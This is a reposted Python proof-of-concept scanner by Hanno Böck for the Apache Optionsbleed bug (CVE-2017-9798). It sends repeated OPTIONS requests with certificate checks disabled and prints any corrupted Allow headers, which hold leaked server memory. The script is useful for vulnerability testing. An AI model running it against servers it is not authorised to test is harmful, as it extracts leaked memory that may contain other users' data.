Apache - HTTP OPTIONS Memory Leak
Source: vfocus.net  Author: Bock  Published: 2017-09-19
#!/usr/bin/env python3

# Optionsbleed proof of concept test
# by Hanno Böck

import argparse
import urllib3
import re


def test_bleed(url, args):
    # Send one OPTIONS request and classify the returned Allow header.
    r = pool.request('OPTIONS', url)
    try:
        allow = str(r.headers["Allow"])
    except KeyError:
        # No Allow header: nothing to test on this URL.
        return False
    if allow in dup:
        # This exact header value was already reported.
        return
    dup.append(allow)
    if allow == "":
        print("[empty] %s" % (url))
    elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$", allow):
        # Well-formed comma-separated method list; check for repeated entries.
        z = [x.strip() for x in allow.split(',')]
        if len(z) > len(set(z)):
            print("[duplicates] %s: %s" % (url, repr(allow)))
        elif args.all:
            print("[ok] %s: %s" % (url, repr(allow)))
    elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$", allow):
        print("[spaces] %s: %s" % (url, repr(allow)))
    else:
        # Anything else is a corrupted header value.
        print("[bleed] %s: %s" % (url, repr(allow)))
    return True


parser = argparse.ArgumentParser(
    description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',
    epilog="Tests server for Optionsbleed bug and other bugs in the allow header.\n\n"
    "Automatically checks http://, https://, http://www. and https://www. -\n"
    "except if you pass -u/--url (which means by default we check 40 times.)\n\n"
    "Explanation of results:\n"
    "[bleed] corrupted header found, vulnerable\n"
    "[empty] empty allow header, does not make sense\n"
    "[spaces] space-separated method list (should be comma-separated)\n"
    "[duplicates] duplicates in list (may be apache bug 61207)\n"
    "[ok] normal list found (only shown with -a/--all)\n",
    formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('hosttocheck', action='store',
                    help='The hostname you want to test against')
parser.add_argument('-n', nargs=1, type=int, default=[10],
                    help='number of tests (default 10)')
parser.add_argument("-a", "--all", action="store_true",
                    help="show headers from hosts without problems")
parser.add_argument("-u", "--url", action='store_true',
                    help="pass URL instead of hostname")
args = parser.parse_args()
howoften = int(args.n[0])

# Allow header values already seen, so each distinct value is reported once.
dup = []

# Note: This disables warnings about the lack of certificate verification.
# Usually this is a bad idea, but for this tool we want to find vulnerabilities
# even if they are shipped with invalid certificates.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

pool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')

if args.url:
    test_bleed(args.hosttocheck, args)
else:
    for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:
        for i in range(howoften):
            try:
                # Stop probing this prefix once a response has no Allow header.
                if test_bleed(prefix+args.hosttocheck, args) is False:
                    break
            except Exception as e:
                pass
 